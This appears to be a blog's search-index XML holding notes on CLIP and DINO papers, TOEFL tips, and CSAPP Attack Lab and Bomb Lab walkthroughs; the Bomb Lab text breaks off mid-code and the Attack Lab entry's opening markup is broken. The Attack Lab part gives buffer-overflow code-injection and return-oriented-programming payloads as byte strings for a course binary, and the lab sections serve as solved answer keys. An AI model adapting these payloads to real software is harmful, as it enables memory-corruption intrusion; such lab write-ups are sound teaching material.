-
Notifications
You must be signed in to change notification settings - Fork 0
/
local-search.xml
154 lines (72 loc) · 60.5 KB
/
local-search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CLIP for Dense Tasks</title>
<link href="/2024/02/08/CLIP4Dense/"/>
<url>/2024/02/08/CLIP4Dense/</url>
<content type="html"><![CDATA[<p>#! <a href="https://zhuanlan.zhihu.com/p/681837427">https://zhuanlan.zhihu.com/p/681837427</a></p><h1 id="Extract-Free-Dense-Labels-from-CLIP-MaskCLIP"><a href="#Extract-Free-Dense-Labels-from-CLIP-MaskCLIP" class="headerlink" title="Extract Free Dense Labels from CLIP (MaskCLIP)"></a>Extract Free Dense Labels from CLIP (MaskCLIP)</h1><p>(ECCV 2022 Oral)</p><p><img src="/image-2.png"></p><p>以 patch 为单位与 text embeddings 点乘做分类</p><h1 id="Perceptual-Grouping-in-Contrastive-Vision-Language-Models-CLIPpy"><a href="#Perceptual-Grouping-in-Contrastive-Vision-Language-Models-CLIPpy" class="headerlink" title="Perceptual Grouping in Contrastive Vision-Language Models (CLIPpy)"></a>Perceptual Grouping in Contrastive Vision-Language Models (CLIPpy)</h1><p>(ICCV 2023)</p><p><img src="/image-9.png"></p><h1 id="Open-Vocabulary-Semantic-Segmentation-with-Patch-Aligned-Contrastive-Learning-PACL"><a href="#Open-Vocabulary-Semantic-Segmentation-with-Patch-Aligned-Contrastive-Learning-PACL" class="headerlink" title="Open Vocabulary Semantic Segmentation with Patch Aligned Contrastive Learning (PACL)"></a>Open Vocabulary Semantic Segmentation with Patch Aligned Contrastive Learning (PACL)</h1><p>(CVPR 2023 Highlight)</p><p><img src="/image-7.png"></p><h2 id="Observation"><a href="#Observation" class="headerlink" title="Observation"></a>Observation</h2><ul><li>alignment between image and text <strong>at a patch level</strong> does not necessarily exist<br><img src="/image.png"></li><li>CLIP’s vision encoders outperform DINO on <strong>semantic coherence</strong> (semantically similar regions in images should produce similar patch representations in the vision encoder)<br><img src="/image-6.png"></li></ul><h2 id="Method"><a href="#Method" class="headerlink" title="Method"></a>Method</h2><p><img src="/image-8.png"></p><p>Patch Aligned Contrastive Learning: take a <em>weighted sum</em> over vision patch embeddings where the weights are obtained from the patch-level similarities with the text embedding.</p><h2 id="Experiments"><a href="#Experiments" class="headerlink" title="Experiments"></a>Experiments</h2><ul><li><p>Only train the small vision embedder on 30M image-text datasets.</p></li><li><p>Zero-shot Semantic Segmentation:</p><ul><li>Stride trick at inference: a change to the stride of the convolutional layer to extract image patches in ViT can provide better fine-grained patches at inference time.<br><img src="/image-10.png"></li></ul></li><li><p>有趣的发现:</p><ul><li>CLIP B/16 > CLIP L/14 > DINO B/16</li><li>PACL 效果与模型的 semantic coherence 正相关</li></ul></li></ul><h1 id="SegCLIP-Patch-Aggregation-with-Learnable-Centers-for-Open-Vocabulary-Semantic-Segmentation"><a href="#SegCLIP-Patch-Aggregation-with-Learnable-Centers-for-Open-Vocabulary-Semantic-Segmentation" class="headerlink" title="SegCLIP: Patch Aggregation with Learnable Centers for Open-Vocabulary Semantic Segmentation"></a>SegCLIP: Patch Aggregation with Learnable Centers for Open-Vocabulary Semantic Segmentation</h1><p>(ICML 2023)</p><p><img src="/image-11.png"></p><h1 id="CLIPSelf-Vision-Transformer-Distills-Itself-for-Open-Vocabulary-Dense-Prediction"><a href="#CLIPSelf-Vision-Transformer-Distills-Itself-for-Open-Vocabulary-Dense-Prediction" class="headerlink" title="CLIPSelf: Vision Transformer Distills Itself for Open-Vocabulary Dense Prediction"></a>CLIPSelf: Vision Transformer Distills Itself for Open-Vocabulary Dense Prediction</h1><p>(ICLR 2024 Spotlight)</p><h2 id="Observation-1"><a href="#Observation-1" class="headerlink" title="Observation"></a>Observation</h2><p><img src="/image-3.png"></p><p>比较 CLIP Resnet/ViT,Image Crop/Dense Feature 的 classification accuracy,发现:</p><ul><li>对 whole image 和 cropped image 分类,ViT > Resnet</li><li>用 representations pooled from the feature map 分类,ViT 点掉了很多,Resnet 基本不受影响</li></ul><p>对 feature map 做 K-Means 聚类并可视化,表明 ViT 的比较杂乱。</p><p>可能原因:</p><ul><li>ViT lacks local inductive bias, hindering the smooth transfer from representing pixels of a whole image to representing pixels of a local image region.</li><li>each spot on the dense feature map of the CLIP ViT tends to encode the global image.</li></ul><p>通过 Retrieval experiment on images and regions 验证:the dense features are well matched with the corresponding images, indicating that each location on the dense feature map tends to encode a global image representation.</p><h2 id="Method-1"><a href="#Method-1" class="headerlink" title="Method"></a>Method</h2><p><img src="/image-4.png"></p><p>方法很简单:既然 Image Crop 比 Dense Feature 分类效果好,那就用 the representations of image crops 蒸馏 the region representations pooled from the dense feature map!</p><ul><li>Image Patches as Regions: $m \times n$ patches.</li><li>Self-Distillation: align the region representations pooled from dense feature maps to the image representations of the corresponding image crops.</li></ul><p>$$<br>\mathcal{L} = \frac{1}{m \times n} \sum\limits_{i=0}^{m-1} \sum\limits_{j=0}^{n-1} \left(1-\frac{s_{\text {dense }}^{i j} \cdot t_{\text {image }}^{i j}}{\left|s_{\text {dense }}^{i j}\right| \cdot \left|t_{\text {image }}^{i j}\right|}\right)<br>$$</p><h2 id="Experiments-1"><a href="#Experiments-1" class="headerlink" title="Experiments"></a>Experiments</h2><ul><li><p>fine-tune CLIP on COCO</p></li><li><p>K-Means visualization:<br><img src="/image-5.png"></p></li><li><p>Open-Vocabulary Dense Prediction: 用作 Open-Vocabulary Object Detection (F-VLM) / Semantic Segmentation (Cat-Seg) / Panoptic Segmentation (ODISE) 的 backbone,点数能涨不少。</p></li></ul>]]></content>
<categories>
<category>DL</category>
</categories>
</entry>
<entry>
<title>Fantastic DINO and Why They Pick It</title>
<link href="/2024/02/08/DINO/"/>
<url>/2024/02/08/DINO/</url>
<content type="html"><![CDATA[<p>#! <a href="https://zhuanlan.zhihu.com/p/681763809">https://zhuanlan.zhihu.com/p/681763809</a></p><h1 id="Emerging-Properties-in-Self-Supervised-Vision-Transformers-DINO"><a href="#Emerging-Properties-in-Self-Supervised-Vision-Transformers-DINO" class="headerlink" title="Emerging Properties in Self-Supervised Vision Transformers (DINO)"></a>Emerging Properties in Self-Supervised Vision Transformers (DINO)</h1><p>(ICCV 2021)</p><p>self-supervised ViT features contain explicit information about the semantic segmentation of an image:</p><ul><li><strong>explicit semantic information</strong> in attention maps<br><img src="/image.png"></li><li>different heads can attend to different semantic regions of an image<br><img src="/image-1.png"></li><li>取 attention map 中前 60% 的 patches 直接分割;supervised ViT 没有这样的好性质<br><img src="/image-2.png"></li><li>选一些 reference points 算 self-attention<br><img src="/image-3.png"></li></ul><h1 id="Localizing-Objects-with-Self-Supervised-Transformers-and-no-Labels-LOST"><a href="#Localizing-Objects-with-Self-Supervised-Transformers-and-no-Labels-LOST" class="headerlink" title="Localizing Objects with Self-Supervised Transformers and no Labels (LOST)"></a>Localizing Objects with Self-Supervised Transformers and no Labels (LOST)</h1><p>(BMVC 2021)</p><p>Object Discovery</p><p>leverage high-quality features obtained from DINO:</p><ul><li>use the <em>key</em> component of the last attention layer for computing the similarities between the different patches</li><li>localize a part of an object by selecting the patch with the least number of similar patches</li></ul><p><img src="/image-7.png"></p><h1 id="Unsupervised-Object-Localization-Observing-the-Background-to-Discover-Objects-FOUND"><a href="#Unsupervised-Object-Localization-Observing-the-Background-to-Discover-Objects-FOUND" class="headerlink" title="Unsupervised Object Localization: Observing the Background to Discover Objects (FOUND)"></a>Unsupervised Object Localization: Observing the Background to Discover Objects (FOUND)</h1><p>(CVPR 2023)</p><p>前/背景分割</p><p><img src="/image-6.png"></p><p>leverage attention maps in DINO:</p><ul><li>select one of the patches that received the <em>least attention</em><ul><li>some heads are noisy $\Rightarrow$ reduce the effect of noisy attention maps based on the sparsity concept<br><img src="/image-5.png"></li></ul></li><li>the background mask incorporates patches similar to this mined one</li></ul><h1 id="Bridging-the-Gap-to-Real-World-Object-Centric-Learning-DINOSAUR"><a href="#Bridging-the-Gap-to-Real-World-Object-Centric-Learning-DINOSAUR" class="headerlink" title="Bridging the Gap to Real-World Object-Centric Learning (DINOSAUR)"></a>Bridging the Gap to Real-World Object-Centric Learning (DINOSAUR)</h1><p>(ICLR 2023)</p><p><img src="/image-8.png"></p><p>reconstruct DINO features that have a high level of <strong>homogeneity within objects</strong></p><h1 id="Unsupervised-Semantic-Segmentation-with-Self-supervised-Object-centric-Representations"><a href="#Unsupervised-Semantic-Segmentation-with-Self-supervised-Object-centric-Representations" class="headerlink" title="Unsupervised Semantic Segmentation with Self-supervised Object-centric Representations"></a>Unsupervised Semantic Segmentation with Self-supervised Object-centric Representations</h1><p>(ICLR 2023 notable top 25%)</p><p><img src="/image-11.png"></p><ul><li>the attention maps of their DINO approach are not strong enough on a broad enough set of images to kickstart unsupervised semantic segmentation<br><img src="/image-9.png"></li><li>but their learned features within an object region yield clusters of surprisingly <strong>high purity</strong> and <strong>align well with underlying object categories</strong><br><img src="/image-10.png"></li></ul><h1 id="CLIP-DINOiser-Teaching-CLIP-a-few-DINO-tricks"><a href="#CLIP-DINOiser-Teaching-CLIP-a-few-DINO-tricks" class="headerlink" title="CLIP-DINOiser: Teaching CLIP a few DINO tricks"></a>CLIP-DINOiser: Teaching CLIP a few DINO tricks</h1><p><img src="/image-12.png"></p><p>integrate <strong>localization priors</strong> extracted from DINO:</p><ul><li>use the <em>value</em> embeddings have finer correlation than those of key<br><img src="/image-14.png"></li><li>DINO features are more <strong>densely and accurately correlated</strong> than those of CLIP<br><img src="/image-13.png"></li></ul><h1 id="Vision-Transformers-Need-Registers"><a href="#Vision-Transformers-Need-Registers" class="headerlink" title="Vision Transformers Need Registers"></a>Vision Transformers Need Registers</h1><p>(ICLR 2024 Oral)</p><p>探究 Why artifacts emerge in the attention maps of ViTs except DINO?<br><img src="/image-4.png"></p>]]></content>
<categories>
<category>DL</category>
</categories>
</entry>
<entry>
<title>TOEFL</title>
<link href="/2024/01/20/TOEFL/"/>
<url>/2024/01/20/TOEFL/</url>
<content type="html"><![CDATA[<p>今天上午考了托福,痛失 2100 元。<br>考试心态需要调整。别太紧张,“来都来了”,还是全情投入考试中。<br>痛定思痛,现将一些经验整理如下。</p><h1 id="听力"><a href="#听力" class="headerlink" title="听力"></a>听力</h1><p>Tips:</p><p>关注主题</p><p>开头可能虚晃一枪</p><p>关注逻辑<br>举例是为了说明什么?</p><p>留意重要的连接词,如 cause however 等</p><p>教授表达情感、观点时要留意</p><p>结尾荡开一笔,也别松懈</p><p>选项有对比(比较级)时慎重选择,易无中生有</p><h1 id="口语"><a href="#口语" class="headerlink" title="口语"></a>口语</h1><p>Transitions:</p><ul><li>Cause & Effect: accordingly, as a result, consequently, therefore</li><li>Combinations: additionally, furthermore, moreover, in addition, finally</li><li>Contrast: in contrast, however, on the other hand, although</li><li>Illustration: for instance, for example, to illustrate, specifically, to be specific</li></ul><h2 id="独立口语"><a href="#独立口语" class="headerlink" title="独立口语"></a>独立口语</h2><p>Point 8’<br>Reason1 25’<br>Reason2 12’<br>(…)</p><p>万能理由:</p><ul><li>health (physical & mental)<br>unwind myself and easy my nerves</li><li>personal development<br>enlarge my vision</li><li>communication (w teachers / peers)<br>break the ice, broaden one’s social connection</li><li>emotion (friendship, kinship, teacher-student relationship)</li><li>convenience</li><li>efficiency</li><li>safety</li><li>economical</li><li>environmental protection</li></ul><h2 id="综合口语"><a href="#综合口语" class="headerlink" title="综合口语"></a>综合口语</h2><h3 id="Campus-Announcement-Discussion"><a href="#Campus-Announcement-Discussion" class="headerlink" title="Campus Announcement & Discussion"></a>Campus Announcement & Discussion</h3><p>In the reading passage, the university has decided to … (决定的内容) / In this letter, the student proposes that the university should … (建议的内容).<br>This is because …</p><p>The woman in the conversation agrees / however disagrees with the decision / suggestion.<br>The first reason is that, (听力 1)<br>In addition, she argues that (听力 2)</p><p>(That’s why …)</p><h3 id="General-to-Specific"><a href="#General-to-Specific" class="headerlink" title="General to Specific"></a>General to Specific</h3><p>The subject of the lecture is …<br>The professor elaborates on this by providing two examples / an example.</p><p>The first concerns … / To begin with, he explains …</p><p>The second example is … / Next, he notes that …</p><p>(…)</p><h3 id="Academic-Lecture"><a href="#Academic-Lecture" class="headerlink" title="Academic Lecture"></a>Academic Lecture</h3><p>The main idea of the lecture is that …<br>The professor gives two examples of …</p><p>The first is that …</p><p>On the other hand, …</p><p>(These examples demonstrate …)</p><h1 id="写作"><a href="#写作" class="headerlink" title="写作"></a>写作</h1><h2 id="综合写作"><a href="#综合写作" class="headerlink" title="综合写作"></a>综合写作</h2><p>250+</p><p>细节</p><p>逻辑连接词<br>少用被动,少用 which 从句</p><p>结构:<br>The author of the passage believes that …<br>However, a professor provides a compelling counterpoint, contesting these claims with well-structured arguments.</p><p>Firstly, the professor challenges the author’s viewpoint that …<br>He posits a different perspective, emphasizing that …<br>He highlights …</p><p>Secondly, in contrast to the point made in the reading that …, the professor argues that …<br>He also corrects …, noting that …</p><p>Lastly, while the author implies that …, the professor presents a dissenting view.<br>He points out that …</p><h2 id="学术讨论写作"><a href="#学术讨论写作" class="headerlink" title="学术讨论写作"></a>学术讨论写作</h2><p>120+</p><p>结构:<br>让步型<br>XX presents a compelling argument in favor of …<br>Admittedly,<br>However, considering …, I am inclined to<br>From my perspective,<br>In other words,<br>For example,<br>Therefore,</p><p>补充型<br>In my opinion,<br>I strongly agree XX’s idea that …<br>I would add that …<br>XX raised the relevant point that …, but he/she did not mention that …<br>For example,</p>]]></content>
</entry>
<entry>
<title>Attack Lab</title>
<link href="/2023/12/18/Attack-Lab/"/>
<url>/2023/12/18/Attack-Lab/</url>
<content type="html"><"></p><p>cookie 值 0x704163d2 转 ASCII 为:37 30 34 31 36 33 64 32 00</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs txt">48 c7 c7 08 2c 62 55 68<br>ef 17 40 00 c3 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>d8 2b 62 55 00 00 00 00<br>37 30 34 31 36 33 64 32<br>00<br></code></pre></td></tr></table></figure><h1 id="Return-Oriented-Programming"><a href="#Return-Oriented-Programming" class="headerlink" title="Return-Oriented Programming"></a>Return-Oriented Programming</h1><p>攻击 <code>rtarget</code>:栈随机化 + 栈上代码不可执行,现在怎么办?<br>在已经存在的程序中找到特定的以 <code>ret</code> 结尾的指令序列为我们所用,把要用到部分的地址压入栈中,每次 <code>ret</code> 后又会取出下一个 gadget。这样就能形成一个程序链,实现攻击。<br>需要从 gadget farm 中,找出有用的 gadget,执行类似于上面第 2 关和第 3 关的攻击。</p><p><img src="/images/Attack-Lab/ROP.png" alt="ROP"></p><h2 id="4"><a href="#4" class="headerlink" title="4"></a>4</h2><p>重复 2 的攻击,也就是需要拼出下面的代码:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm">movq $0x704163d2, %rdi<br>pushq $0x40171b<br>ret<br></code></pre></td></tr></table></figure><p>将 cookie 放在栈上,再借助 gadget 里的 pop 指令,将存入的 cookie 弹出。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs asm"># gadget<br>popq %rdi # 5f<br>ret<br></code></pre></td></tr></table></figure><p>但是,farm 中找不到 5f</p><p>于是只能曲线救国,使用两个 gadget:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs asm"># gadget 1<br>popq %rax # 58<br>ret<br># gadget 2<br>movq %rax, %rdi # 48 89 c7<br>ret<br></code></pre></td></tr></table></figure><p>反汇编 <code>rtarget</code></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sh">objdump -d rtarget > rtarget.s<br></code></pre></td></tr></table></figure><p>查找 58:<br><img src="/images/Attack-Lab/4_1.png"><br>地址 401885</p><p>查找 48 89 c7:<br><img src="/images/Attack-Lab/4_2.png"><br>地址 4018a6</p><hr><p>最终栈结构:<br><img src="/images/Attack-Lab/4_3.png" alt="来源 [CSAPP | Lab3-Attack Lab 深入解析 - 知乎](https://zhuanlan.zhihu.com/p/476396465)"></p><p>写入:</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs txt">00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>85 18 40 00 00 00 00 00<br>d2 63 41 70 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>1b 17 40 00 00 00 00 00<br></code></pre></td></tr></table></figure><h2 id="5"><a href="#5" class="headerlink" title="5"></a>5</h2><p>重复 3 的攻击,即要求:最终,%rdi 存 cookie 地址,然后返回 <code>touch3</code>。</p><p>区别在于,由于栈随机化,不再能像 3 中一样直接获取 cookie 字符串的地址。<br>解决方案:在代码中获取 %rsp 的地址,然后加上偏移量来确定 cookie 的地址。</p><p>怎么加?发现有一个 add 的 gadget。<br><img src="/images/Attack-Lab/5_2.png"><br>地址 4018b6</p><p>查找 mov %rax, %rdi -48 89 c7 :<br><img src="/images/Attack-Lab/5_6.png"><br>地址 4018a6</p><p>此前,需要把基址 %rsp 移到 %rdi,偏移量移到 %rsi。</p><p>查找 mov %rsp , %___ - 48 89 e_:<br><img src="/images/Attack-Lab/5_1.png"><br>48 89 e0 - <code>mov %rsp, %rax</code><br>地址 4018bd</p><p>查找 <code>mov %rax, %rdi</code> - 48 89 c7:<br>同 4,地址 4018a6</p><p>现在已经有了基址,偏移量还需要从栈上弹出,然后一顿倒寄存器。</p><p>查找 <code>popq %rax</code> - 58:<br>同 4,地址 401885</p><p>逆序查找,偏移量需要从 %rax 最终移到 %rsi。但是,farm 中并没有以 %rsi 为目标的 mov 指令。<br>于是只能改用低字节的 movl。</p><p>查找 movl %___ , %esi:<br><img src="/images/Attack-Lab/5_3.png"><br>89 d6 - <code>movl %edx, %esi</code><br>地址 401988</p><p>查找 movl %___ , %edx:<br><img src="/images/Attack-Lab/5_4.png"><br>这里,84 c0 是 testb,对结果没有影响<br>89 ca - <code>movl %ecx, %edx</code><br>地址 4018ca</p><p>查找 movl %___ , %ecx:<br><img src="/images/Attack-Lab/5_5.png"><br>这里,84 d2 是 testb,对结果没有影响<br>89 c1 - <code>movl %eax, %ecx</code><br>地址 4018c4</p><hr><p>最终栈结构:<br><img src="/images/Attack-Lab/5.png" alt="来源 [CSAPP | Lab3-Attack Lab 深入解析 - 知乎](https://zhuanlan.zhihu.com/p/476396465),具体寄存器并不对应"></p><p>偏移量 8 * 10 - 8 = 72 = 0x48 (从 getbuf 返回时,%rsp 往上挪了一格)<br>写入:</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs txt">00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>00 00 00 00 00 00 00 00<br>bd 18 40 00 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>85 18 40 00 00 00 00 00<br>48 00 00 00 00 00 00 00<br>c4 18 40 00 00 00 00 00<br>ca 18 40 00 00 00 00 00<br>88 19 40 00 00 00 00 00<br>b6 18 40 00 00 00 00 00<br>a6 18 40 00 00 00 00 00<br>ef 17 40 00 00 00 00 00<br>37 30 34 31 36 33 64 32<br>00<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CSAPP</category>
</categories>
</entry>
<entry>
<title>Bomb Lab</title>
<link href="/2023/12/18/Bomb-Lab/"/>
<url>/2023/12/18/Bomb-Lab/</url>
<content type="html"><![CDATA[<h1 id="gdb-基本使用"><a href="#gdb-基本使用" class="headerlink" title="gdb 基本使用"></a>gdb 基本使用</h1><p>参考书 p194</p><p>disassemble …</p><p>break …</p><p>nexti<br>stepi</p><p>continue</p><p>x /FMT ADDRESS<br>print EXP</p><p>run ARGS</p><h1 id="1-字符串比较"><a href="#1-字符串比较" class="headerlink" title="1 字符串比较"></a>1 字符串比较</h1><p>layout asm</p><p>disas phase_1</p><p>调用 strings_not_equal<br>要求返回 0 - equal</p><p>x /s 0x4024c0<br>“I am not part of the problem. I am a Republican.”<br>将其写入 ans.txt</p><p>break phase_1<br>run ans.txt<br>nexti<br>print $eax</p><h1 id="2-循环"><a href="#2-循环" class="headerlink" title="2 循环"></a>2 循环</h1><p>disas phase_2</p><p>调用 read_six_numbers:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">mov $<span class="hljs-number">0x4027b5</span>,%esi<br></code></pre></td></tr></table></figure><p>x /s 0x4027b5<br>“%d %d %d %d %d %d”</p><p>调用 sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th><th>%r8</th><th>%r9</th><th>(%rsp)</th><th>(%rsp+8)</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp</td><td>%rsp + 4</td><td>%rsp + 8</td><td>%rsp + 12</td><td>%rsp + 16</td><td>%rsp + 20</td></tr></tbody></table><p>循环:第一个数为 1,后面依次翻倍<br>1 2 4 8 16 32</p><h1 id="3-条件-分支"><a href="#3-条件-分支" class="headerlink" title="3 条件/分支"></a>3 条件/分支</h1><p>disas phase_3</p><p>调用 sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp + 12</td><td>%rsp + 8</td></tr></tbody></table><p>x /s 0x4027c1<br>“%d %d”</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0x7</span>,<span class="hljs-number">0xc</span>(%rsp)<br>ja<br></code></pre></td></tr></table></figure><p>第一个数 <= 7</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">jmpq *<span class="hljs-number">0x402520</span>(,%rax,<span class="hljs-number">8</span>)<br></code></pre></td></tr></table></figure><p>不妨令第一个数 = 1<br>x /x 0x402528<br>0x00400fc9</p><p>第二个数 0x52</p><h1 id="4-递归调用和栈"><a href="#4-递归调用和栈" class="headerlink" title="4 递归调用和栈"></a>4 递归调用和栈</h1><p>disas phase_4</p><p>同 3,调用 sscanf:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th><th>%rcx</th></tr></thead><tbody><tr><td>str</td><td>fmt</td><td>%rsp + 12</td><td>%rsp + 8</td></tr></tbody></table><p>x /s 0x4027c1<br>“%d %d”</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0xe</span>,<span class="hljs-number">0xc</span>(%rsp)<br>jbe<br></code></pre></td></tr></table></figure><p>第一个数 <= 14</p><p>调用 func4:</p><table><thead><tr><th>%rdi</th><th>%rsi</th><th>%rdx</th></tr></thead><tbody><tr><td>第一个数</td><td>0</td><td>14</td></tr></tbody></table><p>disas func4</p><p>递归调用</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">cmp $<span class="hljs-number">0xf</span>,%eax<br></code></pre></td></tr></table></figure><p>要求返回值为 f<br>第一个数 = 5</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">cmpl $<span class="hljs-number">0xf</span>,<span class="hljs-number">0x8</span>(%rsp)<br></code></pre></td></tr></table></figure><p>第二个数 = f</p><h1 id="5-指针"><a href="#5-指针" class="headerlink" title="5 指针"></a>5 指针</h1><p>disas phase_5</p><p>调用 string_length</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">cmp $<span class="hljs-number">0x6</span>,%eax<br>je<br></code></pre></td></tr></table></figure><p>要求字符串长度为 6</p><p>进入循环:<br>循环 6 次,结果 %edx=0x37</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c">movzbl (%rbx,%rax,<span class="hljs-number">1</span>),%ecx<br>and $<span class="hljs-number">0xf</span>,%ecx<br>add <span class="hljs-number">0x402560</span>(,%rcx,<span class="hljs-number">4</span>),%edx<br></code></pre></td></tr></table></figure><p>x /6x 0x402560<br>2 a 6 1 c 10</p><p>16+12+10+10+6+1=55<br>ASCII 码末四位作为索引 5 4 1 1 2 3<br>edaabc</p><h1 id="6-链表-指针-结构"><a href="#6-链表-指针-结构" class="headerlink" title="6 链表/指针/结构"></a>6 链表/指针/结构</h1><p>disas phase_6</p><p>调用 read_six_numbers<br>放到从 %rsp+0x30 开始处</p><p>大循环 1:<br>六个数都不同,并且均 <= 6</p><p>循环 2:<br>x /24 0x6042f0</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">0x6042f0</span> <node1>: <span class="hljs-number">0</span>x00000271 <span class="hljs-number">0</span>x00000001 <span class="hljs-number">0</span>x00604300 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604300</span> <node2>: <span class="hljs-number">0</span>x000002f2 <span class="hljs-number">0</span>x00000002 <span class="hljs-number">0</span>x00604310 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604310</span> <node3>: <span class="hljs-number">0</span>x00000111 <span class="hljs-number">0</span>x00000003 <span class="hljs-number">0</span>x00604320 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604320</span> <node4>: <span class="hljs-number">0</span>x00000231 <span class="hljs-number">0</span>x00000004 <span class="hljs-number">0</span>x00604330 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604330</span> <node5>: <span class="hljs-number">0</span>x0000016e <span class="hljs-number">0</span>x00000005 <span class="hljs-number">0</span>x00604340 <span class="hljs-number">0</span>x00000000<br><span class="hljs-attribute">0x604340</span> <node6>: <span class="hljs-number">0</span>x0000022f <span class="hljs-number">0</span>x00000006 <span class="hljs-number">0</span>x00000000 <span class="hljs-number">0</span>x00000000<br><br><span class="hljs-attribute">0x6042f0</span> <node1>: <span class="hljs-number">625</span> <span class="hljs-number">1</span> <span class="hljs-number">6308608</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604300</span> <node2>: <span class="hljs-number">754</span> <span class="hljs-number">2</span> <span class="hljs-number">6308624</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604310</span> <node3>: <span class="hljs-number">273</span> <span class="hljs-number">3</span> <span class="hljs-number">6308640</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604320</span> <node4>: <span class="hljs-number">561</span> <span class="hljs-number">4</span> <span class="hljs-number">6308656</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604330</span> <node5>: <span class="hljs-number">366</span> <span class="hljs-number">5</span> <span class="hljs-number">6308672</span> <span class="hljs-number">0</span><br><span class="hljs-attribute">0x604340</span> <node6>: <span class="hljs-number">559</span> <span class="hljs-number">6</span> <span class="hljs-number">0</span> <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure><p>struct 链表:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">Node</span>{</span><br> <span class="hljs-type">int</span> val;<br> <span class="hljs-type">int</span> 